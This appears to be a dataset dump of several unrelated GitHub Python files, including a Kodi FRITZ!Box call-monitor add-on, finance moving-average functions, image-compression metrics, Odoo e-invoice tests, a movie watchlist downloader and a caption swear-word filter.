self.equal_numbers(number, request_number):\n return entry\n\n return False\n\n def get_image_by_name(self, name, number):\n\n def get_google_image(url):\n url = re.sub(r',\\d*$', '', url)\n m = hashlib.md5()\n m.update(url)\n file_name = m.encode('utf-8').hexdigest()\n file_path = os.path.join(xbmcvfs.translatePath('special://temp'),\n \"%s_%s\" % (__addon__.getAddonInfo('id'), file_name))\n\n if not os.path.isfile(file_path):\n image = self.__gdata_request.request(url, pretty=False)\n file_handler = open(file_path, 'wb')\n file_handler.write(image)\n file_handler.close()\n\n return file_path\n\n if __addon__.getSetting(\"Addressbook_Folderimages\") == 'true':\n imagepath = __addon__.getSetting(\"Addressbook_Folderimages_Path\")\n if not xbmcvfs.exists(imagepath):\n xbmc.log(\"FRITZBOX-CALLMONITOR: Images path %s does not exist.\" % imagepath)\n else:\n dirs, files = xbmcvfs.listdir(imagepath)\n for picture in files:\n match = re.match(r'([^.]*)', picture)\n if re.match:\n file_short_name = match.group(1)\n if file_short_name == name or self.equal_numbers(file_short_name, number):\n return \"%s%s\" % (imagepath, picture)\n\n if isinstance(self.__fb_phonebook, dict):\n if name in self.__fb_phonebook:\n if \"imageHttpURL\" in self.__fb_phonebook[name]:\n\n if self.__fb_phonebook[name][\"imageHttpURL\"].startswith('https://www.google.com/'):\n # noinspection PyBroadException\n try:\n return get_google_image(self.__fb_phonebook[name][\"imageHttpURL\"])\n except Exception:\n xbmc.log('FRITZBOX-CALLMONITOR: ' + traceback.format_exc())\n else:\n return self.__fb_phonebook[name][\"imageHttpURL\"]\n\n return False\n\n @staticmethod\n def is_playback_paused():\n return bool(xbmc.getCondVisibility(\"Player.Paused\"))\n\n def resume_playback(self, delay):\n if self.is_playback_paused():\n\n if int(__addon__.getSetting(\"Action_OnHangup_Resume_Delay\")) > 0:\n url = \"plugin://%s/show_resume_progress_and_resume/%d\" % (\n __addon_id__, delay)\n xbmc.executebuiltin('RunPlugin(\"%s\")' % url)\n else:\n xbmc.Player().pause()\n\n def pause(self, video_playback_only):\n\n if not xbmc.Player().isPlaying():\n return False\n\n if self.is_playback_paused():\n return False\n\n if video_playback_only and not xbmc.Player().isPlayingVideo():\n return False\n\n xbmc.Player().pause()\n if self.__ring_time:\n xbmc.Player().seekTime(self.__ring_time)\n self.__auto_paused = True\n\n return True\n\n def lower_volume(self, amount):\n volume_json = xbmc.executeJSONRPC(json.dumps(\n dict(jsonrpc=\"2.0\", method=\"Application.GetProperties\", params=dict(properties=[\"volume\", ]), id=1)))\n if \"result\" in json.loads(volume_json):\n volume = json.loads(volume_json)[\"result\"][\"volume\"]\n new_volume = int(volume - (int(float(amount)) * volume / 100))\n\n if volume:\n if not self.__auto_volume_lowered:\n self.__auto_volume_lowered = volume\n xbmc.executeJSONRPC(json.dumps(\n dict(jsonrpc=\"2.0\", method=\"Application.SetVolume\", params=dict(volume=new_volume), id=1)))\n\n def reset_volume(self):\n if self.__auto_volume_lowered:\n xbmc.executeJSONRPC(json.dumps(\n dict(jsonrpc=\"2.0\", method=\"Application.SetVolume\", params=dict(volume=self.__auto_volume_lowered),\n id=1)))\n self.__auto_volume_lowered = False\n\n def handle_outgoing_call(self, line):\n\n if self.is_ignored_number([line.number_caller, line.number_called], printout=True):\n return False\n else:\n self.__connections[line.connection_id] = line\n\n name = self.get_name_by_number(line.number_called) or str(line.number_called)\n image = self.get_image_by_name(name, line.number_called)\n\n if __addon__.getSetting(\"Action_OnLeaving_Notify\") == 'true':\n self.show_notification(_('leaving call'), _('to %s (by %s)') % (name, line.number_caller), img=image)\n\n if xbmc.Player().isPlayingVideo():\n self.__ring_time = xbmc.Player().getTime()\n\n if __addon__.getSetting(\"Action_OnLeaving_Pause\") == 'true':\n self.pause(video_playback_only=__addon__.getSetting(\"Action_OnLeaving_Pause_VideoOnly\") == 'true')\n\n def handle_incoming_call(self, line):\n\n if self.is_ignored_number([line.number_caller, line.number_called], printout=True):\n return False\n else:\n self.__connections[line.connection_id] = line\n\n name = self.get_name_by_number(line.number_caller) or str(line.number_caller)\n image = self.get_image_by_name(name, line.number_caller)\n\n if __addon__.getSetting(\"Action_OnRing_Notify\") == 'true':\n self.show_notification(_('incoming call'), _('from %s') % name, img=image)\n\n if __addon__.getSetting(\"Action_OnRing_LowerVolume\") == 'true':\n self.lower_volume(__addon__.getSetting(\"Action_OnRing_LowerVolume_Amount\"))\n\n if __addon__.getSetting(\"Action_OnRing_Pause\") == 'true':\n self.pause(video_playback_only=__addon__.getSetting(\"Action_OnRing_Pause_VideoOnly\") == 'true')\n\n if xbmc.Player().isPlayingVideo():\n self.__ring_time = xbmc.Player().getTime()\n\n def handle_connected(self, line):\n\n if not line.connection_id in self.__connections:\n return False\n\n name = self.get_name_by_number(line.number) or str(line.number)\n image = self.get_image_by_name(name, line.number)\n\n if __addon__.getSetting(\"Action_OnConnect_Notify\") == 'true':\n self.show_notification(_('connected'), _('to %s') % name, img=image)\n\n if __addon__.getSetting(\"Action_OnConnect_LowerVolume\") == 'true':\n self.lower_volume(__addon__.getSetting(\"Action_OnConnect_LowerVolume_Amount\"))\n\n if __addon__.getSetting(\"Action_OnConnect_Pause\") == 'true':\n self.pause(video_playback_only=__addon__.getSetting(\"Action_OnConnect_Pause_VideoOnly\") == 'true')\n\n def handle_disconnected(self, line):\n\n if not line.connection_id in self.__connections:\n return False\n\n if __addon__.getSetting(\"Action_OnHangup_Notify\") == 'true':\n self.show_notification(_('call ended'), _('duration: %sh') % str(line.duration))\n\n if __addon__.getSetting(\"Action_OnHangup_ResetVolume\") == 'true':\n self.reset_volume()\n\n if __addon__.getSetting(\"Action_OnHangup_Resume\") == 'true':\n if self.__auto_paused:\n self.__auto_paused = False\n self.resume_playback(delay=int(__addon__.getSetting(\"Action_OnHangup_Resume_Delay\")))\n\n del self.__connections[line.connection_id]\n\n @staticmethod\n def show_notification(title, text, duration=False, img=False):\n\n xbmc.log(\"FRITZBOX-CALLMONITOR-NOTIFICATION: %s, %s\" % (title, text))\n if xbmc.getCondVisibility(\"System.ScreenSaverActive\"):\n xbmc.executebuiltin('ActivateWindow(%s)' % xbmcgui.getCurrentWindowId())\n if not duration:\n duration = __addon__.getSetting(\"Action_Notification_Duration\")\n duration = int(duration) * 1000\n if not img:\n img = xbmcvfs.translatePath(os.path.join(xbmcaddon.Addon().getAddonInfo('path'), \"media\", \"default.png\"))\n return xbmc.executebuiltin('Notification(\"%s\", \"%s\", %d, \"%s\")' % (title, text, duration, img))\n\n def start(self):\n\n ip = __addon__.getSetting(\"Monitor_Address\")\n xbmc.log('FRITZBOX-CALLMONITOR: started')\n connection_ready_notification = False\n connection_failed_notification = False\n\n # noinspection PyBroadException\n try:\n\n while not KODIMONITOR.waitForAbort(1):\n\n try:\n box_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n box_socket.connect((ip, 1012))\n box_socket.settimeout(0.2)\n if not connection_ready_notification:\n xbmc.log('FRITZBOX-CALLMONITOR: connected')\n connection_ready_notification = True\n connection_failed_notification = False\n\n except socket.error as e:\n if not connection_failed_notification:\n #self.show_notification(\n # _('fritzbox unreachable'),\n # _('could not connect to fritzbox (%s).') % e)\n connection_ready_notification = False\n #connection_failed_notification = True\n #xbmc.log('FRITZBOX-CALLMONITOR: could not connect %s on port 1012 (%s)' % (ip, e))\n #xbmc.log('FRITZBOX-CALLMONITOR: do you have activated the callmonitor via #96*5* ' +\n # 'and a valid network connection?')\n KODIMONITOR.waitForAbort(5)\n\n else:\n try:\n for _ in range(20): # 20 * 0.2 sec\n try:\n message = box_socket.recv(1024)\n line = self.CallMonitorLine(message)\n xbmc.log(\"FRITZBOX-CALLMONITOR: %s\" % str(line))\n {'CALL': self.handle_outgoing_call,\n 'RING': self.handle_incoming_call,\n 'CONNECT': self.handle_connected,\n 'DISCONNECT': self.handle_disconnected\n }.get(line.command, self.error)(line)\n if KODIMONITOR.waitForAbort(1):\n break\n\n except socket.timeout:\n # this is absolute normal an occurs every 0.2 seconds\n pass\n\n except socket.error as e:\n # connection disrupted, wait a while and retry\n connection_ready_notification = False\n connection_failed_notification = False\n xbmc.log('FRITZBOX-CALLMONITOR: connection disrupted: %s' % e)\n KODIMONITOR.waitForAbort(5)\n\n finally:\n box_socket.close()\n\n except FritzCallMonitor.CallMonitorLine.UnexpectedCommandException as e:\n xbmc.log('FRITZBOX-CALLMONITOR: something went wrong with the message from fritzbox (%s).' % e)\n\n except Exception:\n xbmc.log('FRITZBOX-CALLMONITOR: ' + traceback.format_exc(), level=xbmc.LOGERROR)\n\n finally:\n xbmc.log(\"FRITZBOX-CALLMONITOR: addon ended.\")\n\n\nxbmc.log(\"{0:s} version {1:s} ({2:s}:{3:d})\"\n .format(__addon__.getAddonInfo('name'),\n __addon__.getAddonInfo('version'),\n hashlib.md5(open(__file__).read().encode('utf-8')).hexdigest(),\n int(os.path.getmtime(__file__))))\n\nFritzCallMonitor().start()\n","repo_name":"ksooo/service.kodi-fritzbox-callmonitor","sub_path":"default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":20133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12349500243","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jul 4 10:56:10 2022\r\n\r\n@author: rjara\r\n\"\"\"\r\n#%%\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nimport datetime\r\n\r\nimport pandas_datareader as pdr\r\nimport pandas_datareader.data as web\r\nimport math as m\r\n#%%\r\ninicio= datetime.datetime(2015, 6, 9)\r\nfin= datetime.datetime(2020, 6, 9)\r\n\r\nApple= web.DataReader('AAPL','yahoo',inicio, fin)\r\n#%%\r\ndef mmovil(n, precios):\r\n promedios=[0]*(n-1)\r\n \r\n for i in range(n-1, len(precios)):\r\n suma = 0\r\n for k in range (n):\r\n suma += precios[i-k]\r\n a = suma/n\r\n promedios.append(a)\r\n \r\n return promedios\r\n\r\ndef mmponderada(n, precios):\r\n promedios=[0]*(n-1)\r\n \r\n for i in range(n-1, len(precios)):\r\n suma = 0\r\n denominador=0\r\n for k in range (n):\r\n suma += precios[i-k] *(n-k)\r\n denominador= denominador + (n-k)\r\n \r\n a = suma/denominador\r\n promedios.append(a)\r\n return promedios\r\n\r\ndef EMA(n, precios):\r\n promedios=[0]*(n-1)\r\n k=2/(n+1)\r\n \r\n for i in range(n-1, len(precios)):\r\n if i ==n-1:\r\n suma=0\r\n for j in range(n):\r\n suma += precios[j]\r\n a= suma/n\r\n promedios.append(a)\r\n print(promedios) \r\n else:\r\n promedios.append((precios[n-2 +i])*k+promedios[n-3+i]*(1-k))\r\n print(promedios)\r\n return promedios\r\n\r\n\r\nx=[3,4,2,8,9,4,4,12,5,7,9]\r\n\r\nEMA(2, x)\r\n\r\ndef graficar(precios, mm, x):\r\n \r\n plt.style.use(\"seaborn\")\r\n plt.plot(x, p, \"black\")\r\n plt.plot(x,mm, \"orange\")\r\n \r\n#%%\r\np= list(Apple.Close)\r\np\r\nx= Apple.index\r\n\r\nmm= mmponderada(100, p)\r\nmm\r\n\r\ngraficar(p, mm,x)\r\n\r\n\r\n \r\n\r\n","repo_name":"joacoarana/Programming-Applied-to-Finance","sub_path":"media_movil/mediamovil_2.py","file_name":"mediamovil_2.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26808069918","text":"import time\nimport numpy as np\nimport math\nimport matplotlib.image as img\nfrom . import custom_lzma \nfrom . import image_utils\nfrom . import glob\nfrom . import compression_utils\nfrom . import compressor\nfrom . import decompressor\n\n\n\n\ndef evaluate_compression_ratio(rgb_image, alpha_channel, code, p=True):\n (compressed_blocks_lz, compressed_blocks_shape, \n important_errors_lz, imp_errors_shape,\n padding_info, width_immagine_originale,\n height_immagine_originale, alpha_channel_lz) = code\n \n \n size_rgb_image= number_of_bytes(rgb_image)\n if p:\n print(\"size_rgb_image \" + str(size_rgb_image) + \n \" shape rgb image \" + str(np.asarray(rgb_image).shape))\n print(\"type rgb_image \" + str(type(rgb_image[0][0][0])) + \"\\n\")\n \n if(alpha_channel is not None):\n size_alpha_channel= number_of_bytes(alpha_channel)\n if p:\n print(\"size_alpha_channel \" + str(size_alpha_channel))\n print(\"type alpha_channel \" + str(type(alpha_channel[0][0][0])) + \"\\n\")\n else: \n size_alpha_channel=0\n if p:\n print(\"size_alpha_channel = 0 \\n\")\n \n size_compressed_blocks_lz= len(compressed_blocks_lz)\n if p:\n print(\"size_compressed_blocks_lz \" + str(size_compressed_blocks_lz))\n print(\"type compressed_blocks_lz \" + str(type(compressed_blocks_lz)) + \"\\n\")\n \n size_important_errors_lz= len(important_errors_lz)\n if p:\n print(\"size_important_errors \" + str(size_important_errors_lz))\n print(\"type important_errors_lz \" + str(type(important_errors_lz)) + \"\\n\")\n \n if (alpha_channel_lz is not None):\n size_alpha_channel_lz= len(alpha_channel_lz)\n if p:\n print(\"size_alpha_channel_lz \" + str(size_alpha_channel_lz))\n print(\"type alpha_channel_lz \" + str(type(alpha_channel_lz)) + \"\\n\")\n else :\n size_alpha_channel_lz=0\n if p:\n print(\"size_alpha_channel_lz = 0 \\n\")\n \n \n compressed_size=size_compressed_blocks_lz + size_important_errors_lz + size_alpha_channel_lz\n original_size=size_alpha_channel + size_rgb_image\n \n if p:\n print (\"compression_ratio = original_size/compressed_size \\n\" + \n \"original_size = size_alpha_channel + size_rgb_image \\n\" + \n \"compressed_size = size_compressed_blocks_lz \" +\n \"+ size_important_errors_lz + size_alpha_channel_lz \")\n \n return original_size/compressed_size\n\n\n\ndef number_of_bytes(data_structure):\n if (data_structure is None):\n return 0\n #Sono tutti float32\n size=1\n for i in range (0, len((np.asarray(data_structure)).shape)):\n size *= np.asarray(data_structure).shape[i]\n return 4 * size\n\n\n\n\n# Decompress blocks through a decoder, and evaluate decoder decompression error.\ndef autoencoder_error_evaluation(rgb_image, compressed_blocks,\n decompression_net, width_immagine_originale, \n height_immagine_originale, padding_info,\n p=True):\n \n net_decompressed_image = compression_utils.image_decompression_with_autoencoder(decompression_net, compressed_blocks,\n padding_info, width_immagine_originale,\n height_immagine_originale, p)\n \n net_decompressed_image = image_utils.unpad_image(net_decompressed_image, padding_info)\n \n error_image = net_decompressed_image - rgb_image\n error_image = error_image.reshape(-1)\n mean = np.mean(error_image)\n std = np.std(error_image)\n\n error_image_absolute = np.absolute(error_image)\n mean_absolute = np.mean(error_image_absolute)\n std_absolute = np.std(error_image_absolute)\n \n\n return error_image, error_image_absolute, mean, std, mean_absolute, std_absolute\n \n \n \ndef validation_set_autoencoder_error_evaluation(compression_net, decompression_net, p=True):\n validation_set_errors = []\n for i in range (20):\n image_path = \"dataset/valid/\" + str(i) + \".png\"\n rgb_image, alpha_channel=image_utils.load_image(image_path)\n\n width_immagine_originale=len(rgb_image[0])\n height_immagine_originale=len(rgb_image)\n\n img_padded, padding_info = image_utils.pad_test_image(rgb_image)\n image_blocks = image_utils.get_test_blocks(img_padded, padding_info)\n\n\n # Lossy image blocks compression through encoder network\n compressed_blocks=compression_utils.compress_image(compression_net, image_blocks)\n compressed_blocks_shape = np.asarray(compressed_blocks).shape\n \n error_informations = autoencoder_error_evaluation(rgb_image, compressed_blocks,\n decompression_net, width_immagine_originale, \n height_immagine_originale, padding_info,\n p=False)\n error_informations = error_informations [2:6]\n validation_set_errors.append(error_informations)\n \n return validation_set_errors\n \n \n \ndef get_psnr(original, decompressed):\n h = original.shape[0]\n w = original.shape[1]\n\n mse = 0\n for r in range(h):\n for c in range(w):\n for v in range(3):\n mse += (original[r, c, v]-decompressed[r, c, v])**2\n\n mse = mse/float(h*w)\n arg = 1/(mse**(1/2))\n return 20*math.log10(arg)\n\n\n\ndef estimate_psnr_and_compr_ratio(image_paths, compression_net, decompression_net):\n psnrs = [[], [], []]\n compression_ratios = [[], [], []]\n rgb_images = []\n \n for idx in range (len(image_paths)):\n rgb_image, alpha_channel = image_utils.load_image(image_paths[idx])\n rgb_images.append(rgb_image)\n \n \n \n for quality in range(1, 101):\n for idx in range (len(rgb_images)):\n rgb_image = rgb_images[idx]\n compression_code = compressor.compress(image_paths[idx], compression_net, decompression_net, quality, False)\n \n \n compression_ratios[idx].append(evaluate_compression_ratio(rgb_image, alpha_channel, \n compression_code, False))\n \n decompressor.decompress(compression_code, decompression_net, False)\n time.sleep(0.250)\n err_corrected_image = image_utils.load_image(\"predicted/decompression_error_corrected.png\")[0]\n\n\n psnrs[idx].append(get_psnr(rgb_image, err_corrected_image [:,:,:3])) \n \n print(\"PSNRs and compression ratios with error correction quality \" + str(quality) + \" estimated\")\n \n return psnrs, compression_ratios","repo_name":"FraMog/A-Convolutional-Autoencoder-for-PNG-Images-compression-and-decompression","sub_path":"CompressioneDati/utils/performance_utils.py","file_name":"performance_utils.py","file_ext":"py","file_size_in_byte":6872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27281429138","text":"from itertools import product\nimport copy\n\nh,w,k = map(int, input().split())\ncl = []\nb_cnt = 0\nfor _ in range(h):\n row = list(input())\n cl.append(row)\n b_cnt += row.count('#')\n\n# print(b_cnt)\n\npattern = 2\n# ite_h = product(range(pattern),repeat=h)\n# ite_w = product(range(pattern),repeat=w)\nite = product(range(pattern),repeat=h+w)\nans = 0\n\nfor it in ite:\n curr_it = list(it)\n it_h = curr_it[:h]\n it_w = curr_it[h:]\n\n# for it_h in ite_h:\n# for it_w in ite_w:\n curr_cl = copy.deepcopy(cl)\n cnt = 0\n for hi in range(h):\n if it_h[hi] == 0: continue\n for wi in range(w):\n if curr_cl[hi][wi] == '#':\n curr_cl[hi][wi] = 'r'\n cnt += 1\n for wi in range(w):\n if it_w[wi] == 0: continue\n for hi in range(h):\n if curr_cl[hi][wi] == '#':\n curr_cl[hi][wi] = 'r'\n cnt += 1\n\n if b_cnt-cnt == k:\n ans += 1\n # print()\n # print(it_h, it_w)\n # print(curr_cl)\n # print(cnt)\n\nprint(ans)","repo_name":"nami4mo/competitive-programming","sub_path":"1_contest/previous/abc173/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40677470597","text":"import base64\n\nfrom odoo import fields\nfrom odoo.tests import Form, tagged\n\nfrom .fatturapa_common import FatturaPACommon\n\n\n@tagged(\"post_install\", \"-at_install\")\nclass TestFatturaPAXMLValidation(FatturaPACommon):\n def setUp(self):\n super(TestFatturaPAXMLValidation, self).setUp()\n\n # XXX - a company named \"YourCompany\" alread exists\n # we move it out of the way but we should do better here\n self.env.company.sudo().search([(\"name\", \"=\", \"YourCompany\")]).write(\n {\"name\": \"YourCompany_\"}\n )\n\n self.env.company.name = \"YourCompany\"\n self.env.company.vat = \"IT06363391001\"\n self.env.company.fatturapa_art73 = True\n self.env.company.partner_id.street = \"Via Milano, 1\"\n self.env.company.partner_id.city = \"Roma\"\n self.env.company.partner_id.state_id = self.env.ref(\"base.state_us_2\").id\n self.env.company.partner_id.zip = \"00100\"\n self.env.company.partner_id.phone = \"06543534343\"\n self.env.company.email = \"info@yourcompany.example.com\"\n self.env.company.partner_id.country_id = self.env.ref(\"base.it\").id\n self.env.company.fatturapa_fiscal_position_id = self.env.ref(\n \"l10n_it_fatturapa.fatturapa_RF01\"\n ).id\n\n self.env.ref(\"product.decimal_product_uom\").digits = 3\n self.env.ref(\"uom.product_uom_unit\").name = \"Unit(s)\"\n\n tax_form = Form(self.env[\"account.tax\"])\n tax_form.name = \"22%\"\n tax_form.amount = 22\n self.tax22 = tax_form.save()\n\n tax_form = Form(self.env[\"account.tax\"])\n tax_form.name = \"FC INC\"\n tax_form.amount = 0\n tax_form.price_include = True\n tax_form.kind_id = self.env.ref(\"l10n_it_account_tax_kind.n3_5\")\n tax_form.law_reference = \"Art. 8 co. 1 lett. c) e co. 2 del DPR 633/72\"\n self.tax1 = tax_form.save()\n\n fp_form = Form(self.env[\"account.fiscal.position\"])\n fp_form.name = \"Test for declaration\"\n fp_form.valid_for_declaration_of_intent = True\n with fp_form.tax_ids.new() as tax_ids:\n tax_ids.tax_src_id = self.tax22\n tax_ids.tax_dest_id = self.tax1\n self.fiscal_position = fp_form.save()\n\n self.payment_term = self.env.ref(\n \"account.account_payment_term_end_following_month\"\n )\n with Form(self.payment_term) as pt_form:\n pt_form.fatturapa_pt_id = self.env.ref(\n \"l10n_it_fiscal_payment_term.fatturapa_tp02\"\n )\n pt_form.fatturapa_pm_id = self.env.ref(\n \"l10n_it_fiscal_payment_term.fatturapa_mp05\"\n )\n\n self.env.ref(\"l10n_it_declaration_of_intent.declaration_of_intent_seq\").copy(\n {\n \"company_id\": self.env.company.id,\n }\n )\n\n def _create_declaration(self):\n dec_form = Form(self.env[\"l10n_it_declaration_of_intent.declaration\"])\n dec_form.partner_id = self.res_partner_fatturapa_0\n dec_form.date = fields.Date.from_string(\"2016-06-15\")\n dec_form.date_start = fields.Date.from_string(\"2016-06-15\")\n dec_form.date_end = fields.Date.today()\n dec_form.taxes_ids.add(self.tax1)\n dec_form.limit_amount = 1000.00\n dec_form.fiscal_position_id = self.fiscal_position\n dec_form.type = \"out\"\n dec_form.telematic_protocol = \"08060120341234567-000001\"\n dec_form.partner_document_number = \"DI/111\"\n dec_form.partner_document_date = fields.Date.from_string(\"2016-06-15\")\n dec = dec_form.save()\n return dec\n\n def _create_invoice(self):\n move_form = Form(\n self.env[\"account.move\"].with_context(default_move_type=\"out_invoice\")\n )\n move_form.invoice_date = fields.Date.from_string(\"2016-06-15\")\n move_form.invoice_date_due = fields.Date.today()\n move_form.partner_id = self.res_partner_fatturapa_0\n move_form.invoice_payment_term_id = self.payment_term\n move_form.fiscal_position_id = self.fiscal_position\n\n with move_form.invoice_line_ids.new() as line_form:\n line_form.product_id = self.product_product_10\n line_form.tax_ids.clear()\n line_form.tax_ids.add(self.tax1)\n invoice = move_form.save()\n return invoice\n\n def test_1_di_xml_export(self):\n dec = self._create_declaration()\n invoice = self._create_invoice()\n invoice.declaration_of_intent_ids = [(6, 0, [dec.id])]\n invoice.invoice_line_ids.filtered(\"product_id\")[\n 0\n ].force_declaration_of_intent_id = dec\n invoice.action_post()\n\n res = self.run_wizard(invoice.id)\n attachment = self.attach_model.browse(res[\"res_id\"])\n self.set_e_invoice_file_id(attachment, \"IT06363391001_00001.xml\")\n xml_content = base64.decodebytes(attachment.datas)\n self.check_content(xml_content, \"IT06363391001_00001.xml\")\n\n def test_2_di_xml_export(self):\n dec = self._create_declaration()\n invoice = self._create_invoice()\n invoice.declaration_of_intent_ids = [(6, 0, [dec.id])]\n invoice.action_post()\n\n res = self.run_wizard(invoice.id)\n attachment = self.attach_model.browse(res[\"res_id\"])\n self.set_e_invoice_file_id(attachment, \"IT06363391001_00002.xml\")\n xml_content = base64.decodebytes(attachment.datas)\n self.check_content(xml_content, \"IT06363391001_00002.xml\")\n\n def test_3_di_xml_export(self):\n dec2 = self._create_declaration()\n dec2.telematic_protocol = \"08060120341234567-000002\"\n dec2.partner_document_number = \"DI/112\"\n\n dec1 = self._create_declaration()\n\n invoice = self._create_invoice()\n invoice.declaration_of_intent_ids = [\n (\n 6,\n 0,\n [\n dec1.id,\n dec2.id,\n ],\n )\n ]\n invoice.invoice_line_ids.filtered(\"product_id\")[\n 0\n ].force_declaration_of_intent_id = dec2\n invoice.action_post()\n\n res = self.run_wizard(invoice.id)\n attachment = self.attach_model.browse(res[\"res_id\"])\n self.set_e_invoice_file_id(attachment, \"IT06363391001_00003.xml\")\n xml_content = base64.decodebytes(attachment.datas)\n self.check_content(xml_content, \"IT06363391001_00003.xml\")\n","repo_name":"OCA/l10n-italy","sub_path":"l10n_it_fatturapa_out_di/tests/test_fatturapa_xml_validation.py","file_name":"test_fatturapa_xml_validation.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"31"} +{"seq_id":"4427549597","text":"from tmdb import MovieTMDB\nfrom download_lb_watchlist import download_lb_watchlist\nimport pandas as pd\n\n# Import exisiting data\ndf_movies_old = pd.read_parquet(\"data/df_movie_info.parquet\")\ndf_movies_old = df_movies_old.drop(\"Year\", axis=1)\n# Get current watchlist data\ndf_lb_watchlist = download_lb_watchlist(\"https://letterboxd.com/mzarchev/watchlist/\")\n# Create a dataframe which have a variable for overlap in movies between watchlist and old dataframe \nouter_join = df_movies_old.merge(df_lb_watchlist,\n left_on=\"Title\",\n right_on = \"Title\",\n how =\"outer\",\n indicator=True)\n\n# Movies only in watchlist should be downloaded (new movies)\nmovies_to_download = outer_join[(outer_join._merge == \"right_only\")].drop(\"_merge\", axis=1)\n# Movies only in old dataframe but not watchlist should be removed (watched movies) \nmovies_to_remove = outer_join[outer_join._merge == \"left_only\"].Title.values\n\ndf_movies = outer_join[outer_join._merge == \"both\"].drop(\"_merge\", axis=1)\n\n# Loop to extract info of movies to download\nfor lb_movie, lb_year in zip(movies_to_download.Title, movies_to_download.Year):\n \n movie = MovieTMDB()\n \n movie.find_movie(query=lb_movie, year=str(lb_year))\n \n try: # Catch if on first loop\n df_movies = pd.concat([movie.return_df(), df_movies],\n ignore_index=True)\n print(\"\\n Processed\", movie.movie_info[\"title\"], \"by\", movie.director, \"\\n\")\n except: continue\n\n# Export\ndf_lb_watchlist.to_csv(\"data/watchlist.csv\")\n\ndf_movies = df_movies.astype({\"Year\":\"int\"})\ndf_movies.to_parquet(\"data/df_movie_info.parquet\")\n","repo_name":"mzarchev/letterboxd_watchlist","sub_path":"download_movie_data.py","file_name":"download_movie_data.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74868374806","text":"import cv2\r\nimport pytesseract\r\nimport requests\r\nfrom webvtt import WebVTT\r\n\r\n# Set up Tesseract OCR engine\r\npytesseract.pytesseract.tesseract_cmd = '/usr/bin/tesseract'\r\n\r\n# Set up OpenCV video capture\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Set up WebVTT closed captioning parser\r\nparser = WebVTT()\r\n\r\n# Load swear words list from a localized CSV file hosted online\r\nresponse = requests.get('*SwearWords.csv*')\r\nswear_words_list = response.text.split(',')\r\n\r\n# Mute audio output\r\ndef mute_audio():\r\n os.system(\"amixer -q -D pulse sset Master 0%\")\r\n\r\n# Unmute audio output\r\ndef unmute_audio():\r\n os.system(\"amixer -q -D pulse sset Master 100%\")\r\n\r\nwhile True:\r\n # Capture frame from HDMI input\r\n ret, frame = cap.read()\r\n\r\n # Use OpenCV to detect the name of the movie or show\r\n movie_or_show_name = pytesseract.image_to_string(frame)\r\n\r\n # Search for closed captioning track online\r\n cc_url = f'https://example.com/{movie_or_show_name}.vtt'\r\n response = requests.get(cc_url)\r\n\r\n if response.status_code == 200:\r\n # Parse closed captioning track using WebVTT\r\n captions = parser.read(response.text)\r\n\r\n # Remove swear words from closed captioning track and censor them\r\n for caption in captions:\r\n caption_text = caption.text\r\n for swear_word in swear_words_list:\r\n if swear_word in caption_text:\r\n caption_text = caption_text.replace(swear_word, '*' * len(swear_word))\r\n caption.text = caption_text\r\n\r\n # Create a new image with the closed caption overlay\r\n caption_image = frame.copy()\r\n caption_text = '\\n'.join([caption.text for caption in captions])\r\n cv2.putText(caption_image, caption_text, (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)\r\n\r\n # Display the image with closed caption overlay\r\n cv2.imshow('Video with Closed Captioning', caption_image)\r\n\r\n # Mute audio output if swear words are present\r\n for caption in captions:\r\n caption_text = caption.text\r\n for swear_word in swear_words_list:\r\n if swear_word in caption_text:\r\n mute_audio()\r\n break\r\n\r\n # Unmute audio output if no swear words are present\r\n unmute_audio()\r\n\r\n else:\r\n print('Closed captioning track not found')\r\n\r\n # Press q to exit the loop\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# Release the video capture and destroy all windows\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"Darkcatching73/hdmi-closed-captioning-filter","sub_path":"Raspberry Pi Build/hdmi_scanner.py","file_name":"hdmi_scanner.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18613417932","text":"import torch\nimport time\nimport pandas as pd\nfrom sentence_transformers import SentenceTransformer\n\ndef create_embedding():\n df = pd.read_csv(\"data/total_data.csv\")\n model = SentenceTransformer('snunlp/KR-SBERT-V40K-klueNLI-augSTS')\n start = time.time()\n des = df[\"description\"]\n title = df[\"title\"]\n\n # description embedding\n print('create description embedding...')\n des_encode = model.encode(des)\n des_emb = torch.tensor(des_encode)\n torch.save(des_emb, \"data/des_emb_SBERT.pt\")\n\n # title embedding\n print('create title embedding...')\n title_encode = model.encode(title)\n title_emb = torch.tensor(title_encode)\n torch.save(title_emb, \"data/title_emb_SBERT.pt\")\n\n end = time.time()\n print(f\"done.. Time elapsed : {end - start:.5f} sec\")\n\ncreate_embedding()\n","repo_name":"Paul-scpark/ETRI-Data-Planet-Project","sub_path":"scripts/create_emb_SBERT.py","file_name":"create_emb_SBERT.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"15197575399","text":"\"\"\"\n\tIndividual plots\n\"\"\"\n\nimport plotly.graph_objs as go\n\nimport constants as c\nimport utilities as u\nfrom data_loader import YML\n\n\nMONTHS_MIN = 3\nMONTHS_REC = 6\n\n\ndef 